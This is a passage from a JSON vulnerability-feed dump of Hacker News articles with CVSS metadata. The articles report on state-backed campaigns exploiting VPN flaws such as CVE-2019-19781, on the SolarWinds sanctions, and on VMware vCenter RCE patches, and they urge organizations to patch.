7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781", "CVE-2020-8199"], "modified": "2020-07-08T07:43:59", "id": "THN:DABC62CDC9B66962217D9A8ABA9DF060", "href": "https://thehackernews.com/2020/07/citrix-software-security-update.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:40:09", "description": "[](<https://thehackernews.com/images/-S81ZTpL3VW0/X2CFi_g7l0I/AAAAAAAAAww/bXeyXz56F-0V-P2VhHdoO5qJllbhNqfswCLcBGAsYHQ/s728-e100/hacking.jpg>)\n\nThe US Cybersecurity and Infrastructure Security Agency (CISA) issued a [new advisory](<https://us-cert.cisa.gov/ncas/alerts/aa20-258a>) on Monday about a wave of cyberattacks carried by Chinese nation-state actors targeting US government agencies and private entities. \n \n\"CISA has observed Chinese [Ministry of State Security]-affiliated cyber threat actors operating from the People's Republic of China using commercially available information sources and open-source exploitation tools to target US Government agency networks,\" the cybersecurity agency said. \n \nOver the past 12 months, the victims were identified through sources such as [Shodan](<https://www.shodan.io/>), the Common Vulnerabilities and Exposure ([CVE](<https://cve.mitre.org/>)) database, and the National Vulnerabilities Database (NVD), exploiting the public release of a vulnerability to pick vulnerable targets and further their motives. \n \nBy compromising legitimate websites and leveraging spear-phishing emails with malicious links pointing to attacker-owned sites in order to gain initial access, the Chinese threat actors have deployed open-source tools such as [Cobalt Strike](<https://www.cobaltstrike.com/>), [China Chopper Web Shell](<https://blog.talosintelligence.com/2019/08/china-chopper-still-active-9-years-later.html>), and [Mimikatz](<https://github.com/gentilkiwi/mimikatz>) credential stealer to extract sensitive information from infected systems. \n \nThat's not all. Taking advantage of the fact that organizations aren't quickly mitigating known software vulnerabilities, the state-sponsored attackers are \"targeting, scanning, and probing\" US government networks for unpatched flaws in F5 Networks Big-IP Traffic Management User Interface ([CVE-2020-5902](<https://support.f5.com/csp/article/K52145254>)), Citrix VPN ([CVE-2019-19781](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>)), Pulse Secure VPN ([CVE-2019-11510](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101>)), and Microsoft Exchange Servers ([CVE-2020-0688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>)) to compromise targets. \n \n\"Cyber threat actors also continue to identify large repositories of credentials that are available on the internet to enable brute-force attacks,\" the agency said. \"While this sort of activity is not a direct result of the exploitation of emergent vulnerabilities, it demonstrates that cyber threat actors can effectively use available open-source information to accomplish their goals.\" \n \nThis is not the first time Chinese actors have worked on behalf of China's MSS to infiltrate various industries across the US and other countries. \n \nIn July, the US Department of Justice (DoJ) [charged two Chinese nationals](<https://thehackernews.com/2020/07/chinese-hackers-covid19.html>) for their alleged involvement in a decade-long hacking spree spanning high tech manufacturing, industrial engineering, defense, educational, gaming software, and pharmaceutical sectors with an aim to steal trade secrets and confidential business information. \n \nBut it's not just China. Earlier this year, Israeli security firm ClearSky uncovered a cyberespionage campaign dubbed \"[Fox Kitten](<https://thehackernews.com/2020/02/iranian-hackers-vpn-vulnerabilities.html>)\" that targeted government, aviation, oil and gas, and security companies by exploiting unpatched VPN vulnerabilities to penetrate and steal information from target companies, prompting CISA to issue [multiple security alerts](<https://thehackernews.com/2020/04/pulse-secure-vpn-vulnerability.html>) urging businesses to secure their VPN environments. \n \nStating that sophisticated cyber threat actors will continue to use open-source resources and tools to single out networks with low-security posture, CISA has recommended organizations to patch [routinely exploited vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>), and \"audit their configuration and patch management programs to ensure they can track and mitigate emerging threats.\"\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-15T09:14:00", "type": "thn", "title": "CISA: Chinese Hackers Exploiting Unpatched Devices to Target U.S. Agencies", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-0688", "CVE-2020-5902"], "modified": "2020-09-15T09:14:30", "id": "THN:0E6CD47141AAF54903BD6C1F9BD96F44", "href": "https://thehackernews.com/2020/09/chinese-hackers-agencies.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:37", "description": "[](<https://thehackernews.com/images/-ZHqaACEm1IE/Xkv7mFYNdVI/AAAAAAAAABQ/u9DIxl0wBik0Tdeo0zYMA5h4Eycz0ntogCLcBGAsYHQ/s728-e100/iranian-apt-hacking-group.jpg>)\n\nA new report published by cybersecurity researchers has unveiled evidence of Iranian state-sponsored hackers targeting dozens of companies and organizations in Israel and around the world over the past three years. \n \nDubbed \"**Fox Kitten**,\" the cyber-espionage campaign is said to have been directed at companies from the IT, telecommunication, oil and gas, aviation, government, and security sectors. \n \n\"We estimate the campaign revealed in this report to be among Iran's most continuous and comprehensive campaigns revealed until now,\" ClearSky [researchers said](<https://www.clearskysec.com/fox-kitten/>). \n \n\"The revealed campaign was used as a reconnaissance infrastructure; however, it can also be used as a platform for spreading and activating destructive malware such as ZeroCleare and Dustman.\" \n \nTying the activities to threat groups APT33, APT34, and APT39, the offensive \u2014 conducted using a mix of open source and self-developed tools \u2014 also facilitated the groups to steal sensitive information and employ supply-chain attacks to target additional organizations, the researchers said. \n \n\n\n## Exploiting VPN Flaws to Compromise Enterprise Networks\n\n \nThe primary attack vector employed by the Iranian groups has been the exploitation of unpatched VPN vulnerabilities to penetrate and steal information from target companies. The prominent VPN systems exploited this way included Pulse Secure Connect ([CVE-2019-11510](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510>)), Palo Alto Networks' Global Protect ([CVE-2019-1579](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1579>)), Fortinet FortiOS ([CVE-2018-13379](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379>)), and Citrix ([CVE-2019-19781](<https://thehackernews.com/2020/01/citrix-adc-gateway-exploit.html>)). \n \nClearSky noted that the hacking groups were able to successfully acquire access to the targets' core systems, drop additional malware, and laterally spread across the network by exploiting \"1-day vulnerabilities in relatively short periods of time.\" \n \n\n\n[](<https://thehackernews.com/images/-HB88FpLNx7E/Xkv6_Gs13XI/AAAAAAAAABE/sTXpiQuKh4w_qMLsMyuIs2xY7eNJONDHQCLcBGAsYHQ/s728-e100/Iranian-hackers-1.jpg>)\n\n \nUpon successfully gaining an initial foothold, the compromised systems were found to communicate with attacker-control command-and-control (C2) servers to download a series of custom VBScript files that can, in turn, be used to plant backdoors. \n \nFurthermore, the backdoor code in itself is downloaded in chunks so as to avoid detection by antivirus software installed on the infected computers. It's the job of a separate downloaded file \u2014 named \"combine.bat\" \u2014 to stitch together these individual files and create an executable. \n \nTo perform these tasks and achieve persistence, the threat actors exploited tools such as [Juicy Potato](<https://github.com/ohpe/juicy-potato>) and [Invoke the Hash](<https://github.com/Kevin-Robertson/Invoke-TheHash>) to gain high-level privileges and laterally move across the network. Some of the other tools developed by the attackers include: \n \n\n\n * STSRCheck - A tool for mapping databases, servers, and open ports in the targeted network and brute-force them by logging with default credentials.\n * Port.exe - A tool to scan predefined ports and servers.\n \nOnce the attackers gained lateral movement capabilities, the attackers move to the final stage: execute the backdoor to scan the compromised system for relevant information and exfiltrate the files back to the attacker by establishing a remote desktop connection (using a self-developed tool called POWSSHNET) or opening a socket-based connection to a hardcoded IP address. \n \n\n\n[](<https://thehackernews.com/images/-I5Tu4KNsPis/Xkv6nXcj6DI/AAAAAAAAAA8/E1cMYGuEIdsjFmfX7dXhnzRwfrgC0_dRACLcBGAsYHQ/s728-e100/Iranian-hackers.jpg>)\n\n \nIn addition, the attackers used [web shells](<https://www.us-cert.gov/ncas/alerts/TA15-314A>) in order to communicate with the servers located inside the target and upload files directly to a C2 server. \n \n\n\n## The Work of Multiple Iranian Hacking Groups\n\n \nBased on the campaign's use of web shells and overlaps with the attack infrastructure, the ClearSky report highlighted that the attacks against VPN servers are possibly linked to three Iranian groups \u2014 APT33 (\"Elfin\"), APT34 (\"OilRig\") and APT39 (Chafer). \n \nWhat's more, the researchers assessed that the campaign is a result of a \"cooperation between the groups in infrastructure,\" citing similarities in the tools and work methods across the three groups. \n \nJust last month, Iranian state-backed hackers \u2014 dubbed \"[Magnallium](<https://www.wired.com/story/iran-apt33-us-electric-grid>)\" \u2014 were discovered carrying out password-spraying attacks targeting US electric utilities as well as oil and gas firms. \n \nGiven that the attackers are weaponizing VPN flaws within 24 hours, it's imperative that organizations install security patches as and when they are available. \n \nAside from following the principle of least privilege, it also goes without saying that critical systems are monitored continuously and kept up to date. Implementing two-step authentication can go a long way towards minimizing unauthorized logins.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-02-18T15:06:00", "type": "thn", "title": "Iranian Hackers Exploiting VPN Flaws to Backdoor Organizations Worldwide", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-1579", "CVE-2019-19781"], "modified": "2020-02-18T15:13:08", "id": "THN:9994A9D5CFB76851BB74C8AD52F3DBBE", "href": "https://thehackernews.com/2020/02/iranian-hackers-vpn-vulnerabilities.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:38:20", "description": "[](<https://thehackernews.com/images/-LTN8ZEVASAQ/YHhnaI6y7gI/AAAAAAAACSI/-4R4GM5jnigOmkENHKFJXtyjjp1f6w4QQCLcBGAsYHQ/s0/us-sanctions-russia-solarwinds-hack.jpg>)\n\nThe U.S. and U.K. on Thursday formally attributed the supply chain attack of IT infrastructure management company SolarWinds with \"high confidence\" to government operatives working for Russia's Foreign Intelligence Service (SVR).\n\n\"Russia's pattern of malign behaviour around the world \u2013 whether in cyberspace, in election interference or in the aggressive operations of their intelligence services \u2013 demonstrates that Russia remains the most acute threat to the U.K.'s national and collective security,\" the U.K. government [said](<https://www.gov.uk/government/news/russia-uk-and-us-expose-global-campaigns-of-malign-activity-by-russian-intelligence-services>) in a statement.\n\nTo that effect, the U.S. Department of the Treasury has imposed sweeping sanctions against Russia for \"undermining the conduct of free and fair elections and democratic institutions\" in the U.S. and for its role in facilitating the sprawling SolarWinds hack, while also barring six technology companies in the country that provide support to the cyber program run by Russian Intelligence Services.\n\n[](<https://thehackernews.com/images/-3aKGKEh2OCw/YHhnxG35qkI/AAAAAAAACSQ/DNi8MHTziNkZeNqP2Y6g9DXrwuwcIBooQCLcBGAsYHQ/s0/russian-hacker.jpg>)\n\nThe companies include ERA Technopolis, Pasit, Federal State Autonomous Scientific Establishment Scientific Research Institute Specialized Security Computing Devices and Automation (SVA), Neobit, Advanced System Technology, and Pozitiv Teknolodzhiz (Positive Technologies), the last three of which are IT security firms whose customers are said to include the Russian Ministry of Defense, SVR, and Russia's Federal Security Service (FSB).\n\n\"As a company, we deny the groundless accusations made by the U.S. Department of the Treasury,\" Positive Technologies [said](<https://www.ptsecurity.com/ww-en/about/news/positive-technologies-official-statement-following-u-s-sanctions/>) in a statement. \"In the almost 20 years we have been operating there has been no evidence of the results of Positive Technologies\u2019 research being used in violation of the principles of business transparency and the ethical exchange of information with the professional information security community.\"\n\nIn addition, the Biden administration is also [expelling ten members](<https://home.treasury.gov/policy-issues/financial-sanctions/recent-actions/20210415>) of Russia's diplomatic mission in Washington, D.C., including representatives of its intelligence services.\n\n\"The scope and scale of this compromise combined with Russia's history of carrying out reckless and disruptive cyber operations makes it a national security concern,\" the Treasury Department [said](<https://home.treasury.gov/news/press-releases/jy0127>). \"The SVR has put at risk the global technology supply chain by allowing malware to be installed on the machines of tens of thousands of SolarWinds' customers.\"\n\nFor its part, Moscow had previously [denied involvement](<https://thehackernews.com/2021/01/fbi-cisa-nsa-officially-blames-russia.html>) in the broad-scope SolarWinds campaign, stating \"it does not conduct offensive operations in the cyber domain.\"\n\nThe [intrusions](<https://thehackernews.com/2021/03/researchers-find-3-new-malware-strains.html>) came to light in December 2020 when FireEye and other cybersecurity firms revealed that the operators behind the espionage campaign managed to compromise the software build and code signing infrastructure of SolarWinds Orion platform as early as October 2019 to deliver the Sunburst backdoor with the goal of gathering sensitive information.\n\nUp to 18,000 SolarWinds customers are believed to have received the trojanized Orion update, although the attackers carefully selected their targets, opting to escalate the attacks only in a handful of cases by deploying Teardrop malware based on an initial reconnaissance of the target environment for high-value accounts and assets.\n\n[](<https://thehackernews.com/images/-K6oDMn9wijo/YHhoAIB7XMI/AAAAAAAACSU/SnX4nr33cRUwtWpMv58gmUlwM1J3GLbGwCLcBGAsYHQ/s0/hack.jpg>)\n\nThe adversary's compromise of the SolarWinds software supply chain is said to have given it the ability to remotely spy or potentially disrupt more than 16,000 computer systems worldwide, according to the [executive order](<https://www.whitehouse.gov/briefing-room/statements-releases/2021/04/15/fact-sheet-imposing-costs-for-harmful-foreign-activities-by-the-russian-government/>) issued by the U.S. government.\n\nBesides infiltrating the networks of [Microsoft](<https://thehackernews.com/2020/12/microsoft-says-its-systems-were-also.html>), [FireEye](<https://thehackernews.com/2020/12/us-agencies-and-fireeye-were-hacked.html>), [Malwarebytes](<https://thehackernews.com/2021/01/solarwinds-hackers-also-breached.html>), and [Mimecast](<https://thehackernews.com/2021/03/mimecast-finds-solarwinds-hackers-stole.html>), the attackers are also said to have used SolarWinds as a stepping stone to breaching several U.S. agencies such as the National Aeronautics and Space Administration (NASA), the Federal Aviation Administration (FAA), and the Departments of State, Justice, Commerce, Homeland Security, Energy, Treasury, and the National Institutes of Health.\n\nThe SVR actor is also known by other names such as APT29, Cozy Bear, and The Dukes, with the threat group being tracked under different monikers, including UNC2452 (FireEye), SolarStorm (Palo Alto Unit 42), StellarParticle (CrowdStrike), Dark Halo (Volexity), and Nobelium (Microsoft).\n\n[](<https://thehackernews.com/images/-JJfhuyyCe1A/YHhoT2JBRoI/AAAAAAAACSg/KKZjhhWheAYDqRlyZsylSiqZ6TohQDq4ACLcBGAsYHQ/s0/cyberattack.jpg>)\n\nFurthermore, the National Security Agency (NSA), the Cybersecurity and Infrastructure Security Agency (CISA), and the Federal Bureau of Investigation (FBI) have jointly released an [advisory](<https://www.nsa.gov/News-Features/Feature-Stories/Article-View/Article/2573391/russian-foreign-intelligence-service-exploiting-five-publicly-known-vulnerabili/>), warning businesses of active exploitation of five publicly known vulnerabilities by APT29 to gain initial footholds into victim devices and networks \u2014 \n\n * [**CVE-2018-13379**](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) \\- Fortinet FortiGate VPN\n * [**CVE-2019-9670**](<https://nvd.nist.gov/vuln/detail/CVE-2019-9670>) \\- Synacor Zimbra Collaboration Suite\n * [**CVE-2019-11510**](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) \\- Pulse Secure Pulse Connect Secure VPN\n * [**CVE-2019-19781**](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) \\- Citrix Application Delivery Controller and Gateway \n * [**CVE-2020-4006**](<https://nvd.nist.gov/vuln/detail/CVE-2020-4006>) \\- VMware Workspace ONE Access\n\nIn a statement shared with The Hacker News, Pulse Secure said the issue identified by the NSA concerns a flaw that was patched on [legacy deployments in April 2019](<https://thehackernews.com/2020/04/pulse-secure-vpn-vulnerability.html>), and that \"customers who followed the instructions in a Pulse Secure security advisory issued at that time have properly protected their systems and mitigated the threat.\"\n\n\"We see what Russia is doing to undermine our democracies,\" said U.K. Foreign Secretary Dominic Raab. \"The U.K. and U.S. are calling out Russia's malicious behaviour, to enable our international partners and businesses at home to better defend and prepare themselves against this kind of action.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-04-15T16:55:00", "type": "thn", "title": "US Sanctions Russia and Expels 10 Diplomats Over SolarWinds Cyberattack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", "CVE-2019-9670", "CVE-2020-4006"], "modified": "2021-06-04T10:27:04", "id": "THN:461B7AEC7D12A32B4ED085F0EA213502", "href": "https://thehackernews.com/2021/04/us-sanctions-russia-and-expels-10.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:18", "description": "[](<https://thehackernews.com/images/-aP3rCXOUpiQ/YIfVcfAWodI/AAAAAAAACX8/f_RfGI2QOewvk7Zu4AaGOKQyirlBpfKfACLcBGAsYHQ/s0/russian-hackers.jpg>)\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA), Department of Homeland Security (DHS), and the Federal Bureau of Investigation (FBI) on Monday published a new joint advisory as part of their latest attempts to expose the tactics, techniques, and procedures (TTPs) adopted by the Russian Foreign Intelligence Service (SVR) in its attacks targeting the U.S and foreign entities.\n\nBy employing \"stealthy intrusion tradecraft within compromised networks,\" the intelligence agencies [said](<https://us-cert.cisa.gov/ncas/current-activity/2021/04/26/fbi-dhs-cisa-joint-advisory-russian-foreign-intelligence-service>), \"the SVR activity\u2014which includes the recent [SolarWinds Orion supply chain compromise](<https://thehackernews.com/2021/04/researchers-find-additional.html>)\u2014primarily targets government networks, think tank and policy analysis organizations, and information technology companies and seeks to gather intelligence information.\"\n\nThe cyber actor is also being tracked under different monikers, including Advanced Persistent Threat 29 (APT29), the Dukes, CozyBear, and Yttrium. The development comes as the U.S. sanctioned Russia and [formally pinned](<https://thehackernews.com/2021/04/us-sanctions-russia-and-expels-10.html>) the SolarWinds hack and related cyberespionage campaign to government operatives working for SVR.\n\n[APT29](<https://malpedia.caad.fkie.fraunhofer.de/actor/apt_29>), since emerging on the threat landscape in 2013, has been tied to a number of attacks orchestrated with an aim to gain access to victim networks, move within victim environments undetected, and extract sensitive information. But in a noticeable shift in tactics in 2018, the actor moved from deploying malware on target networks to striking cloud-based email services, a fact borne by the SolarWinds attack, wherein the actor leveraged Orion binaries as an intrusion vector to exploit Microsoft Office 365 environments.\n\nThis similarity in post-infection tradecraft with other SVR-sponsored attacks, including in the manner the adversary laterally moved through the networks to obtain access to email accounts, is said to have played a huge role in attributing the SolarWinds campaign to the Russian intelligence service, despite a notable departure in the method used to gain an initial foothold.\n\n\"Targeting cloud resources probably reduces the likelihood of detection by using compromised accounts or system misconfigurations to blend in with normal or unmonitored traffic in an environment not well defended, monitored, or understood by victim organizations,\" the agency noted.\n\nAmong some of the other tactics put to use by APT29 are password spraying (observed during a 2018 compromise of a large unnamed network), exploiting zero-day flaws against virtual private network appliances (such as [CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)) to obtain network access, and deploying a Golang malware called [WELLMESS](<https://blogs.jpcert.or.jp/en/2018/07/malware-wellmes-9b78.html>) to plunder [intellectual property](<https://www.pwc.co.uk/issues/cyber-security-services/insights/wellmess-analysis-command-control.html>) from multiple organizations involved in COVID-19 vaccine development.\n\nBesides CVE-2019-19781, the threat actor is known to gain initial footholds into victim devices and networks by leveraging [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>), [CVE-2019-9670](<https://nvd.nist.gov/vuln/detail/CVE-2019-9670>), [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>), and [CVE-2020-4006](<https://nvd.nist.gov/vuln/detail/CVE-2020-4006>). Also in the mix is the practice of obtaining virtual private servers via false identities and cryptocurrencies, and relying on temporary VoIP telephone numbers and email accounts by making use of an anonymous email service called cock.li.\n\n\"The FBI and DHS recommend service providers strengthen their user validation and verification systems to prohibit misuse of their services,\" the advisory read, while also urging businesses to secure their networks from a compromise of trusted software.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-04-27T09:14:00", "type": "thn", "title": "FBI, CISA Uncover Tactics Employed by Russian Intelligence Hackers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", "CVE-2019-9670", "CVE-2020-4006"], "modified": "2021-04-28T06:42:30", "id": "THN:91A2A296EF8B6FD5CD8B904690E810E8", "href": "https://thehackernews.com/2021/04/fbi-cisa-uncover-tactics-employed-by.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:05", "description": "[](<https://thehackernews.com/images/-M_1KgL6tAuQ/YDYE-aJuyBI/AAAAAAAAB38/asAWmk7ZJscXPGS_gHJudw0GOAZrcEX7wCLcBGAsYHQ/s0/vmware.jpg>)\n\nVMware has addressed multiple critical remote code execution (RCE) vulnerabilities in VMware ESXi and vSphere Client virtual infrastructure management platform that may allow attackers to execute arbitrary commands and take control of affected systems.\n\n\"A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server,\" the company [said](<https://www.vmware.com/security/advisories/VMSA-2021-0002.html>) in its advisory.\n\nThe vulnerability, tracked as CVE-2021-21972, has a CVSS score of 9.8 out of a maximum of 10, making it critical in severity.\n\n\"In our opinion, the RCE vulnerability in the vCenter Server can pose no less a threat than the infamous vulnerability in Citrix (CVE-2019-19781),\" said Positive Technologies' Mikhail Klyuchnikov, who discovered and reported the flaw to VMware.\n\n\"The error allows an unauthorized user to send a specially crafted request, which will later give them the opportunity to execute arbitrary commands on the server.\"\n\nWith this access in place, the attacker can then successfully move through the corporate network and gain access to the data stored in the vulnerable system, such as information about virtual machines and system users, [Klyuchnikov noted](<https://swarm.ptsecurity.com/unauth-rce-vmware/>).\n\nSeparately, a second vulnerability (CVE-2021-21973, CVSS score 5.3) allows unauthorized users to send POST requests, permitting an adversary to mount further attacks, including the ability to scan the company's internal network and retrieve specifics about the open ports of various services.\n\nThe information disclosure issue, according to VMware, stems from an SSRF (Server Side Request Forgery) vulnerability due to improper validation of URLs in the vCenter Server plugin.\n\n[](<https://thehackernews.com/images/-ptRHS90VS-M/YDaOLCFCy0I/AAAAAAAA3oU/eE4iu9IU3WI1xoEKlX6eypn5wcFlZWhwQCLcBGAsYHQ/s0/command.jpg>)\n\nVMware has also provided workarounds to remediate CVE-2021-21972 and CVE-2021-21973 temporarily until the updates can be deployed. Detailed steps can be found [here](<https://kb.vmware.com/s/article/82374>).\n\nIt's worth noting that VMware rectified a command injection vulnerability in its vSphere Replication product ([CVE-2021-21976](<https://www.vmware.com/security/advisories/VMSA-2021-0001.html>), CVSS score 7.2) earlier this month that could grant a bad actor with administrative privileges to execute shell commands and achieve RCE.\n\nLastly, VMware also resolved a heap-overflow bug (CVE-2021-21974, CVSS score 8.8) in ESXi's service location protocol (SLP), potentially allowing an attacker on the same network to send malicious SLP requests to an ESXi device and take control of it.\n\n[OpenSLP](<https://www.openslp.org/doc/html/IntroductionToSLP/index.html>) provides a framework to allow networking applications to discover the existence, location, and configuration of networked services in enterprise networks.\n\nThe latest fix for ESXi OpenSLP comes on the heels of a similar patch ([CVE-2020-3992](<https://www.vmware.com/security/advisories/VMSA-2020-0023.html>)) last November that could be leveraged to trigger a [use-after-free](<https://cwe.mitre.org/data/definitions/416.html>) in the OpenSLP service, leading to remote code execution.\n\nNot long after, reports of active exploitation attempts emerged in the wild, with ransomware gangs [abusing](<https://twitter.com/GossiTheDog/status/1324896051128635392>) the vulnerability to take over unpatched virtual machines deployed in enterprise environments and encrypt their virtual hard drives.\n\nIt's highly recommended that users install the updates to eliminate the risk associated with the flaws, in addition to \"removing vCenter Server interfaces from the perimeter of organizations, if they are there, and allocate them to a separate VLAN with a limited access list in the internal network.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-24T07:54:00", "type": "thn", "title": "Critical RCE Flaws Affect VMware ESXi and vSphere Client \u2014 Patch Now", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781", "CVE-2020-3992", "CVE-2021-21972", "CVE-2021-21973", "CVE-2021-21974", "CVE-2021-21976"], "modified": "2021-02-24T17:35:31", "id": "THN:87AE96960D76D6C84D9CF86C2DDB837C", "href": "https://thehackernews.com/2021/02/critical-rce-flaw-affects-vmware.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:15", "description": 